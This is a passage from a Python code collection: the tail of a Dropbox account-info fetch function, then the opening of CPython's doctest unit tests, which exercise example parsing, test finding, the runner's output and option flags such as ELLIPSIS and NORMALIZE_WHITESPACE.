"""Loads user data from service"""
return self.get_json(
'https://api.dropbox.com/1/account/info',
headers={'Authorization': 'Bearer {0}'.format(access_token)}
)
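# Shape of the account-info payload consumed by get_user_details() above
# (a sketch; only the keys this backend actually reads are shown, and the
# values are hypothetical):
#
#   {'uid': 12345678,
#    'display_name': 'Jane Doe',
#    'email': 'jane@example.com'}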
| bsd-3-clause |
PennartLoettring/Poettrix | rootfs/usr/lib/python3.4/test/test_doctest.py | 72 | 94252 | """
Test script for doctest.
"""
from test import support
import doctest
import os
import sys
# NOTE: There are some additional tests relating to interaction with
# zipimport in the test_zipimport_support test module.
######################################################################
## Sample Objects (used by test cases)
######################################################################
def sample_func(v):
"""
Blah blah
>>> print(sample_func(22))
44
Yee ha!
"""
return v+v
class SampleClass:
"""
>>> print(1)
1
>>> # comments get ignored. so are empty PS1 and PS2 prompts:
>>>
...
Multiline example:
>>> sc = SampleClass(3)
>>> for i in range(10):
... sc = sc.double()
... print(' ', sc.get(), sep='', end='')
6 12 24 48 96 192 384 768 1536 3072
"""
def __init__(self, val):
"""
>>> print(SampleClass(12).get())
12
"""
self.val = val
def double(self):
"""
>>> print(SampleClass(12).double().get())
24
"""
return SampleClass(self.val + self.val)
def get(self):
"""
>>> print(SampleClass(-5).get())
-5
"""
return self.val
def a_staticmethod(v):
"""
>>> print(SampleClass.a_staticmethod(10))
11
"""
return v+1
a_staticmethod = staticmethod(a_staticmethod)
def a_classmethod(cls, v):
"""
>>> print(SampleClass.a_classmethod(10))
12
>>> print(SampleClass(0).a_classmethod(10))
12
"""
return v+2
a_classmethod = classmethod(a_classmethod)
a_property = property(get, doc="""
>>> print(SampleClass(22).a_property)
22
""")
class NestedClass:
"""
>>> x = SampleClass.NestedClass(5)
>>> y = x.square()
>>> print(y.get())
25
"""
def __init__(self, val=0):
"""
>>> print(SampleClass.NestedClass().get())
0
"""
self.val = val
def square(self):
return SampleClass.NestedClass(self.val*self.val)
def get(self):
return self.val
class SampleNewStyleClass(object):
r"""
>>> print('1\n2\n3')
1
2
3
"""
def __init__(self, val):
"""
>>> print(SampleNewStyleClass(12).get())
12
"""
self.val = val
def double(self):
"""
>>> print(SampleNewStyleClass(12).double().get())
24
"""
return SampleNewStyleClass(self.val + self.val)
def get(self):
"""
>>> print(SampleNewStyleClass(-5).get())
-5
"""
return self.val
######################################################################
## Fake stdin (for testing interactive debugging)
######################################################################
class _FakeInput:
"""
A fake input stream for pdb's interactive debugger. Whenever a
line is read, print it (to simulate the user typing it), and then
return it. The set of lines to return is specified in the
constructor; they should not have trailing newlines.
"""
def __init__(self, lines):
self.lines = lines
def readline(self):
line = self.lines.pop(0)
print(line)
return line+'\n'
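# Typical use (a sketch mirroring the interactive-debugging tests below):
# swap the fake stream in for sys.stdin around the code that triggers pdb,
# and restore it afterwards:
#
#   real_stdin = sys.stdin
#   sys.stdin = _FakeInput(['next', 'print(x)', 'continue'])
#   try:
#       ...  # run code that calls pdb.set_trace()
#   finally:
#       sys.stdin = real_stdin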
######################################################################
## Test Cases
######################################################################
def test_Example(): r"""
Unit tests for the `Example` class.
Example is a simple container class that holds:
- `source`: A source string.
- `want`: An expected output string.
- `exc_msg`: An expected exception message string (or None if no
exception is expected).
- `lineno`: A line number (within the docstring).
- `indent`: The example's indentation in the input string.
- `options`: An option dictionary, mapping option flags to True or
False.
These attributes are set by the constructor. `source` and `want` are
required; the other attributes all have default values:
>>> example = doctest.Example('print(1)', '1\n')
>>> (example.source, example.want, example.exc_msg,
... example.lineno, example.indent, example.options)
('print(1)\n', '1\n', None, 0, 0, {})
The first three attributes (`source`, `want`, and `exc_msg`) may be
specified positionally; the remaining arguments should be specified as
keyword arguments:
>>> exc_msg = 'IndexError: pop from an empty list'
>>> example = doctest.Example('[].pop()', '', exc_msg,
... lineno=5, indent=4,
... options={doctest.ELLIPSIS: True})
>>> (example.source, example.want, example.exc_msg,
... example.lineno, example.indent, example.options)
('[].pop()\n', '', 'IndexError: pop from an empty list\n', 5, 4, {8: True})
The constructor normalizes the `source` string to end in a newline:
Source spans a single line: no terminating newline.
>>> e = doctest.Example('print(1)', '1\n')
>>> e.source, e.want
('print(1)\n', '1\n')
>>> e = doctest.Example('print(1)\n', '1\n')
>>> e.source, e.want
('print(1)\n', '1\n')
Source spans multiple lines: require terminating newline.
>>> e = doctest.Example('print(1);\nprint(2)\n', '1\n2\n')
>>> e.source, e.want
('print(1);\nprint(2)\n', '1\n2\n')
>>> e = doctest.Example('print(1);\nprint(2)', '1\n2\n')
>>> e.source, e.want
('print(1);\nprint(2)\n', '1\n2\n')
Empty source string (which should never appear in real examples)
>>> e = doctest.Example('', '')
>>> e.source, e.want
('\n', '')
The constructor normalizes the `want` string to end in a newline,
unless it's the empty string:
>>> e = doctest.Example('print(1)', '1\n')
>>> e.source, e.want
('print(1)\n', '1\n')
>>> e = doctest.Example('print(1)', '1')
>>> e.source, e.want
('print(1)\n', '1\n')
>>> e = doctest.Example('print', '')
>>> e.source, e.want
('print\n', '')
The constructor normalizes the `exc_msg` string to end in a newline,
unless it's `None`:
Message spans one line
>>> exc_msg = 'IndexError: pop from an empty list'
>>> e = doctest.Example('[].pop()', '', exc_msg)
>>> e.exc_msg
'IndexError: pop from an empty list\n'
>>> exc_msg = 'IndexError: pop from an empty list\n'
>>> e = doctest.Example('[].pop()', '', exc_msg)
>>> e.exc_msg
'IndexError: pop from an empty list\n'
Message spans multiple lines
>>> exc_msg = 'ValueError: 1\n 2'
>>> e = doctest.Example('raise ValueError("1\n 2")', '', exc_msg)
>>> e.exc_msg
'ValueError: 1\n 2\n'
>>> exc_msg = 'ValueError: 1\n 2\n'
>>> e = doctest.Example('raise ValueError("1\n 2")', '', exc_msg)
>>> e.exc_msg
'ValueError: 1\n 2\n'
Empty (but non-None) exception message (which should never appear
in real examples)
>>> exc_msg = ''
>>> e = doctest.Example('raise X()', '', exc_msg)
>>> e.exc_msg
'\n'
Compare `Example`:
>>> example = doctest.Example('print 1', '1\n')
>>> same_example = doctest.Example('print 1', '1\n')
>>> other_example = doctest.Example('print 42', '42\n')
>>> example == same_example
True
>>> example != same_example
False
>>> hash(example) == hash(same_example)
True
>>> example == other_example
False
>>> example != other_example
True
"""
def test_DocTest(): r"""
Unit tests for the `DocTest` class.
DocTest is a collection of examples, extracted from a docstring, along
with information about where the docstring comes from (a name,
filename, and line number). The docstring is parsed by the `DocTest`
constructor:
>>> docstring = '''
... >>> print(12)
... 12
...
... Non-example text.
...
... >>> print('another\example')
... another
... example
... '''
>>> globs = {} # globals to run the test in.
>>> parser = doctest.DocTestParser()
>>> test = parser.get_doctest(docstring, globs, 'some_test',
... 'some_file', 20)
>>> print(test)
<DocTest some_test from some_file:20 (2 examples)>
>>> len(test.examples)
2
>>> e1, e2 = test.examples
>>> (e1.source, e1.want, e1.lineno)
('print(12)\n', '12\n', 1)
>>> (e2.source, e2.want, e2.lineno)
("print('another\\example')\n", 'another\nexample\n', 6)
Source information (name, filename, and line number) is available as
attributes on the doctest object:
>>> (test.name, test.filename, test.lineno)
('some_test', 'some_file', 20)
The line number of an example within its containing file is found by
adding the line number of the example and the line number of its
containing test:
>>> test.lineno + e1.lineno
21
>>> test.lineno + e2.lineno
26
If the docstring contains inconsistent leading whitespace in the
expected output of an example, then `DocTest` will raise a ValueError:
>>> docstring = r'''
... >>> print('bad\nindentation')
... bad
... indentation
... '''
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 4 of the docstring for some_test has inconsistent leading whitespace: 'indentation'
If the docstring contains inconsistent leading whitespace on
continuation lines, then `DocTest` will raise a ValueError:
>>> docstring = r'''
... >>> print(('bad indentation',
... ... 2))
... ('bad', 'indentation')
... '''
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 2 of the docstring for some_test has inconsistent leading whitespace: '... 2))'
If there's no blank space after a PS1 prompt ('>>>'), then `DocTest`
will raise a ValueError:
>>> docstring = '>>>print(1)\n1'
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 1 of the docstring for some_test lacks blank after >>>: '>>>print(1)'
If there's no blank space after a PS2 prompt ('...'), then `DocTest`
will raise a ValueError:
>>> docstring = '>>> if 1:\n...print(1)\n1'
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 2 of the docstring for some_test lacks blank after ...: '...print(1)'
Compare `DocTest`:
>>> docstring = '''
... >>> print 12
... 12
... '''
>>> test = parser.get_doctest(docstring, globs, 'some_test',
... 'some_test', 20)
>>> same_test = parser.get_doctest(docstring, globs, 'some_test',
... 'some_test', 20)
>>> test == same_test
True
>>> test != same_test
False
>>> hash(test) == hash(same_test)
True
>>> docstring = '''
... >>> print 42
... 42
... '''
>>> other_test = parser.get_doctest(docstring, globs, 'other_test',
... 'other_file', 10)
>>> test == other_test
False
>>> test != other_test
True
Compare `DocTestCase`:
>>> DocTestCase = doctest.DocTestCase
>>> test_case = DocTestCase(test)
>>> same_test_case = DocTestCase(same_test)
>>> other_test_case = DocTestCase(other_test)
>>> test_case == same_test_case
True
>>> test_case != same_test_case
False
>>> hash(test_case) == hash(same_test_case)
True
>>> test == other_test_case
False
>>> test != other_test_case
True
"""
class test_DocTestFinder:
def basics(): r"""
Unit tests for the `DocTestFinder` class.
DocTestFinder is used to extract DocTests from an object's docstring
and the docstrings of its contained objects. It can be used with
modules, functions, classes, methods, staticmethods, classmethods, and
properties.
Finding Tests in Functions
~~~~~~~~~~~~~~~~~~~~~~~~~~
For a function whose docstring contains examples, DocTestFinder.find()
will return a single test (for that function's docstring):
>>> finder = doctest.DocTestFinder()
We'll simulate a __file__ attr that ends in pyc:
>>> import test.test_doctest
>>> old = test.test_doctest.__file__
>>> test.test_doctest.__file__ = 'test_doctest.pyc'
>>> tests = finder.find(sample_func)
>>> print(tests) # doctest: +ELLIPSIS
[<DocTest sample_func from ...:18 (1 example)>]
The exact name depends on how test_doctest was invoked, so allow for
leading path components.
>>> tests[0].filename # doctest: +ELLIPSIS
'...test_doctest.py'
>>> test.test_doctest.__file__ = old
>>> e = tests[0].examples[0]
>>> (e.source, e.want, e.lineno)
('print(sample_func(22))\n', '44\n', 3)
By default, tests are created for objects with no docstring:
>>> def no_docstring(v):
... pass
>>> finder.find(no_docstring)
[]
However, the optional argument `exclude_empty` to the DocTestFinder
constructor can be used to exclude tests for objects with empty
docstrings:
>>> def no_docstring(v):
... pass
>>> excl_empty_finder = doctest.DocTestFinder(exclude_empty=True)
>>> excl_empty_finder.find(no_docstring)
[]
If the function has a docstring with no examples, then a test with no
examples is returned. (This lets `DocTestRunner` collect statistics
about which functions have no tests -- but is that useful? And should
an empty test also be created when there's no docstring?)
>>> def no_examples(v):
... ''' no doctest examples '''
>>> finder.find(no_examples) # doctest: +ELLIPSIS
[<DocTest no_examples from ...:1 (no examples)>]
Finding Tests in Classes
~~~~~~~~~~~~~~~~~~~~~~~~
For a class, DocTestFinder will create a test for the class's
docstring, and will recursively explore its contents, including
methods, classmethods, staticmethods, properties, and nested classes.
>>> finder = doctest.DocTestFinder()
>>> tests = finder.find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
3 SampleClass.NestedClass
1 SampleClass.NestedClass.__init__
1 SampleClass.__init__
2 SampleClass.a_classmethod
1 SampleClass.a_property
1 SampleClass.a_staticmethod
1 SampleClass.double
1 SampleClass.get
New-style classes are also supported:
>>> tests = finder.find(SampleNewStyleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
1 SampleNewStyleClass
1 SampleNewStyleClass.__init__
1 SampleNewStyleClass.double
1 SampleNewStyleClass.get
Finding Tests in Modules
~~~~~~~~~~~~~~~~~~~~~~~~
For a module, DocTestFinder will create a test for the class's
docstring, and will recursively explore its contents, including
functions, classes, and the `__test__` dictionary, if it exists:
>>> # A module
>>> import types
>>> m = types.ModuleType('some_module')
>>> def triple(val):
... '''
... >>> print(triple(11))
... 33
... '''
... return val*3
>>> m.__dict__.update({
... 'sample_func': sample_func,
... 'SampleClass': SampleClass,
... '__doc__': '''
... Module docstring.
... >>> print('module')
... module
... ''',
... '__test__': {
... 'd': '>>> print(6)\n6\n>>> print(7)\n7\n',
... 'c': triple}})
>>> finder = doctest.DocTestFinder()
>>> # Use module=test.test_doctest, to prevent doctest from
>>> # ignoring the objects since they weren't defined in m.
>>> import test.test_doctest
>>> tests = finder.find(m, module=test.test_doctest)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
1 some_module
3 some_module.SampleClass
3 some_module.SampleClass.NestedClass
1 some_module.SampleClass.NestedClass.__init__
1 some_module.SampleClass.__init__
2 some_module.SampleClass.a_classmethod
1 some_module.SampleClass.a_property
1 some_module.SampleClass.a_staticmethod
1 some_module.SampleClass.double
1 some_module.SampleClass.get
1 some_module.__test__.c
2 some_module.__test__.d
1 some_module.sample_func
Duplicate Removal
~~~~~~~~~~~~~~~~~
If a single object is listed twice (under different names), then tests
will only be generated for it once:
>>> from test import doctest_aliases
>>> assert doctest_aliases.TwoNames.f
>>> assert doctest_aliases.TwoNames.g
>>> tests = excl_empty_finder.find(doctest_aliases)
>>> print(len(tests))
2
>>> print(tests[0].name)
test.doctest_aliases.TwoNames
TwoNames.f and TwoNames.g are bound to the same object.
We can't guess which will be found in doctest's traversal of
TwoNames.__dict__ first, so we have to allow for either.
>>> tests[1].name.split('.')[-1] in ['f', 'g']
True
Empty Tests
~~~~~~~~~~~
By default, an object with no doctests doesn't create any tests:
>>> tests = doctest.DocTestFinder().find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
3 SampleClass.NestedClass
1 SampleClass.NestedClass.__init__
1 SampleClass.__init__
2 SampleClass.a_classmethod
1 SampleClass.a_property
1 SampleClass.a_staticmethod
1 SampleClass.double
1 SampleClass.get
By default, objects with no doctests are excluded. exclude_empty=False
tells it to include (empty) tests for objects with no doctests. This feature
is really to support backward compatibility in what doctest.master.summarize()
displays.
>>> tests = doctest.DocTestFinder(exclude_empty=False).find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
3 SampleClass.NestedClass
1 SampleClass.NestedClass.__init__
0 SampleClass.NestedClass.get
0 SampleClass.NestedClass.square
1 SampleClass.__init__
2 SampleClass.a_classmethod
1 SampleClass.a_property
1 SampleClass.a_staticmethod
1 SampleClass.double
1 SampleClass.get
Turning off Recursion
~~~~~~~~~~~~~~~~~~~~~
DocTestFinder can be told not to look for tests in contained objects
using the `recurse` flag:
>>> tests = doctest.DocTestFinder(recurse=False).find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
Line numbers
~~~~~~~~~~~~
DocTestFinder finds the line number of each example:
>>> def f(x):
... '''
... >>> x = 12
...
... some text
...
... >>> # examples are not created for comments & bare prompts.
... >>>
... ...
...
... >>> for x in range(10):
... ... print(x, end=' ')
... 0 1 2 3 4 5 6 7 8 9
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> [e.lineno for e in test.examples]
[1, 9, 12]
"""
if int.__doc__: # simple check for --without-doc-strings, skip if lacking
def non_Python_modules(): r"""
Finding Doctests in Modules Not Written in Python
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DocTestFinder can also find doctests in most modules not written in Python.
We'll use builtins as an example, since it almost certainly isn't written in
plain ol' Python and is guaranteed to be available.
>>> import builtins
>>> tests = doctest.DocTestFinder().find(builtins)
>>> 790 < len(tests) < 800 # approximate number of objects with docstrings
True
>>> real_tests = [t for t in tests if len(t.examples) > 0]
>>> len(real_tests) # objects that actually have doctests
8
>>> for t in real_tests:
... print('{} {}'.format(len(t.examples), t.name))
...
1 builtins.bin
3 builtins.float.as_integer_ratio
2 builtins.float.fromhex
2 builtins.float.hex
1 builtins.hex
1 builtins.int
2 builtins.int.bit_length
1 builtins.oct
Note here that 'bin', 'oct', and 'hex' are functions; 'float.as_integer_ratio',
'float.hex', and 'int.bit_length' are methods; 'float.fromhex' is a classmethod,
and 'int' is a type.
"""
def test_DocTestParser(): r"""
Unit tests for the `DocTestParser` class.
DocTestParser is used to parse docstrings containing doctest examples.
The `parse` method divides a docstring into examples and intervening
text:
>>> s = '''
... >>> x, y = 2, 3 # no output expected
... >>> if 1:
... ... print(x)
... ... print(y)
... 2
... 3
...
... Some text.
... >>> x+y
... 5
... '''
>>> parser = doctest.DocTestParser()
>>> for piece in parser.parse(s):
... if isinstance(piece, doctest.Example):
... print('Example:', (piece.source, piece.want, piece.lineno))
... else:
... print(' Text:', repr(piece))
Text: '\n'
Example: ('x, y = 2, 3 # no output expected\n', '', 1)
Text: ''
Example: ('if 1:\n print(x)\n print(y)\n', '2\n3\n', 2)
Text: '\nSome text.\n'
Example: ('x+y\n', '5\n', 9)
Text: ''
The `get_examples` method returns just the examples:
>>> for piece in parser.get_examples(s):
... print((piece.source, piece.want, piece.lineno))
('x, y = 2, 3 # no output expected\n', '', 1)
('if 1:\n print(x)\n print(y)\n', '2\n3\n', 2)
('x+y\n', '5\n', 9)
The `get_doctest` method creates a Test from the examples, along with the
given arguments:
>>> test = parser.get_doctest(s, {}, 'name', 'filename', lineno=5)
>>> (test.name, test.filename, test.lineno)
('name', 'filename', 5)
>>> for piece in test.examples:
... print((piece.source, piece.want, piece.lineno))
('x, y = 2, 3 # no output expected\n', '', 1)
('if 1:\n print(x)\n print(y)\n', '2\n3\n', 2)
('x+y\n', '5\n', 9)
"""
class test_DocTestRunner:
def basics(): r"""
Unit tests for the `DocTestRunner` class.
DocTestRunner is used to run DocTest test cases, and to accumulate
statistics. Here's a simple DocTest case we can use:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x)
... 12
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
The main DocTestRunner interface is the `run` method, which runs a
given DocTest case in a given namespace (globs). It returns a tuple
`(f,t)`, where `f` is the number of failed tests and `t` is the number
of tried tests.
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=3)
If any example produces incorrect output, then the test runner reports
the failure and proceeds to the next example:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x)
... 14
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=True).run(test)
... # doctest: +ELLIPSIS
Trying:
x = 12
Expecting nothing
ok
Trying:
print(x)
Expecting:
14
**********************************************************************
File ..., line 4, in f
Failed example:
print(x)
Expected:
14
Got:
12
Trying:
x//2
Expecting:
6
ok
TestResults(failed=1, attempted=3)
"""
def verbose_flag(): r"""
The `verbose` flag makes the test runner generate more detailed
output:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x)
... 12
... >>> x//2
... 6
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=True).run(test)
Trying:
x = 12
Expecting nothing
ok
Trying:
print(x)
Expecting:
12
ok
Trying:
x//2
Expecting:
6
ok
TestResults(failed=0, attempted=3)
If the `verbose` flag is unspecified, then the output will be verbose
iff `-v` appears in sys.argv:
>>> # Save the real sys.argv list.
>>> old_argv = sys.argv
>>> # If -v does not appear in sys.argv, then output isn't verbose.
>>> sys.argv = ['test']
>>> doctest.DocTestRunner().run(test)
TestResults(failed=0, attempted=3)
>>> # If -v does appear in sys.argv, then output is verbose.
>>> sys.argv = ['test', '-v']
>>> doctest.DocTestRunner().run(test)
Trying:
x = 12
Expecting nothing
ok
Trying:
print(x)
Expecting:
12
ok
Trying:
x//2
Expecting:
6
ok
TestResults(failed=0, attempted=3)
>>> # Restore sys.argv
>>> sys.argv = old_argv
In the remaining examples, the test runner's verbosity will be
explicitly set, to ensure that the test behavior is consistent.
"""
def exceptions(): r"""
Tests of `DocTestRunner`'s exception handling.
An expected exception is specified with a traceback message. The
lines between the first line and the type/value may be omitted or
replaced with any other string:
>>> def f(x):
... '''
... >>> x = 12
... >>> print(x//0)
... Traceback (most recent call last):
... ZeroDivisionError: integer division or modulo by zero
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
An example may not generate output before it raises an exception; if
it does, then the traceback message will not be recognized as
signaling an expected exception, so the example will be reported as an
unexpected exception:
>>> def f(x):
... '''
... >>> x = 12
... >>> print('pre-exception output', x//0)
... pre-exception output
... Traceback (most recent call last):
... ZeroDivisionError: integer division or modulo by zero
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 4, in f
Failed example:
print('pre-exception output', x//0)
Exception raised:
...
ZeroDivisionError: integer division or modulo by zero
TestResults(failed=1, attempted=2)
Exception messages may contain newlines:
>>> def f(x):
... r'''
... >>> raise ValueError('multi\nline\nmessage')
... Traceback (most recent call last):
... ValueError: multi
... line
... message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
If an exception is expected, but an exception with the wrong type or
message is raised, then it is reported as a failure:
>>> def f(x):
... r'''
... >>> raise ValueError('message')
... Traceback (most recent call last):
... ValueError: wrong message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
raise ValueError('message')
Expected:
Traceback (most recent call last):
ValueError: wrong message
Got:
Traceback (most recent call last):
...
ValueError: message
TestResults(failed=1, attempted=1)
However, IGNORE_EXCEPTION_DETAIL can be used to allow a mismatch in the
detail:
>>> def f(x):
... r'''
... >>> raise ValueError('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... ValueError: wrong message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
IGNORE_EXCEPTION_DETAIL also ignores difference in exception formatting
between Python versions. For example, in Python 2.x, the module path of
the exception is not in the output, but this will fail under Python 3:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message')
... Traceback (most recent call last):
... HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 4, in f
Failed example:
raise HTTPException('message')
Expected:
Traceback (most recent call last):
HTTPException: message
Got:
Traceback (most recent call last):
...
http.client.HTTPException: message
TestResults(failed=1, attempted=2)
But in Python 3 the module path is included, and therefore a test must look
like the following test to succeed in Python 3. But that test will fail under
Python 2.
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message')
... Traceback (most recent call last):
... http.client.HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
However, with IGNORE_EXCEPTION_DETAIL, the module name of the exception
(or its unexpected absence) will be ignored:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
The module path will be completely ignored, so two different module paths will
still pass if IGNORE_EXCEPTION_DETAIL is given. This is intentional, so it can
be used when exceptions have changed module.
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... foo.bar.HTTPException: message
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
But IGNORE_EXCEPTION_DETAIL does not allow a mismatch in the exception type:
>>> def f(x):
... r'''
... >>> raise ValueError('message') #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... TypeError: wrong type
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
raise ValueError('message') #doctest: +IGNORE_EXCEPTION_DETAIL
Expected:
Traceback (most recent call last):
TypeError: wrong type
Got:
Traceback (most recent call last):
...
ValueError: message
TestResults(failed=1, attempted=1)
If the exception does not have a message, you can still use
IGNORE_EXCEPTION_DETAIL to normalize the modules between Python 2 and 3:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException() #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... foo.bar.HTTPException
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
Note that a trailing colon doesn't matter either:
>>> def f(x):
... r'''
... >>> from http.client import HTTPException
... >>> raise HTTPException() #doctest: +IGNORE_EXCEPTION_DETAIL
... Traceback (most recent call last):
... foo.bar.HTTPException:
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
If an exception is raised but not expected, then it is reported as an
unexpected exception:
>>> def f(x):
... r'''
... >>> 1//0
... 0
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
1//0
Exception raised:
Traceback (most recent call last):
...
ZeroDivisionError: integer division or modulo by zero
TestResults(failed=1, attempted=1)
"""
def displayhook(): r"""
Test that changing sys.displayhook doesn't matter for doctest.
>>> import sys
>>> orig_displayhook = sys.displayhook
>>> def my_displayhook(x):
... print('hi!')
>>> sys.displayhook = my_displayhook
>>> def f():
... '''
... >>> 3
... 3
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> r = doctest.DocTestRunner(verbose=False).run(test)
>>> post_displayhook = sys.displayhook
We need to restore sys.displayhook now, so that we'll be able to test
results.
>>> sys.displayhook = orig_displayhook
Ok, now we can check that everything is ok.
>>> r
TestResults(failed=0, attempted=1)
>>> post_displayhook is my_displayhook
True
"""
def optionflags(): r"""
Tests of `DocTestRunner`'s option flag handling.
Several option flags can be used to customize the behavior of the test
runner. These are defined as module constants in doctest, and passed
to the DocTestRunner constructor (multiple constants should be ORed
together).
The DONT_ACCEPT_TRUE_FOR_1 flag disables matches between True/False
and 1/0:
>>> def f(x):
... '>>> True\n1\n'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.DONT_ACCEPT_TRUE_FOR_1
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
True
Expected:
1
Got:
True
TestResults(failed=1, attempted=1)
The DONT_ACCEPT_BLANKLINE flag disables the match between blank lines
and the '<BLANKLINE>' marker:
>>> def f(x):
... '>>> print("a\\n\\nb")\na\n<BLANKLINE>\nb\n'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.DONT_ACCEPT_BLANKLINE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print("a\n\nb")
Expected:
a
<BLANKLINE>
b
Got:
a
<BLANKLINE>
b
TestResults(failed=1, attempted=1)
The NORMALIZE_WHITESPACE flag causes all sequences of whitespace to be
treated as equal:
>>> def f(x):
... '>>> print(1, 2, 3)\n 1 2\n 3'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(1, 2, 3)
Expected:
1 2
3
Got:
1 2 3
TestResults(failed=1, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.NORMALIZE_WHITESPACE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
TestResults(failed=0, attempted=1)
An example from the docs:
>>> print(list(range(20))) #doctest: +NORMALIZE_WHITESPACE
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
The ELLIPSIS flag causes ellipsis marker ("...") in the expected
output to match any substring in the actual output:
>>> def f(x):
... '>>> print(list(range(15)))\n[0, 1, 2, ..., 14]\n'
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(15)))
Expected:
[0, 1, 2, ..., 14]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
TestResults(failed=1, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.ELLIPSIS
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
TestResults(failed=0, attempted=1)
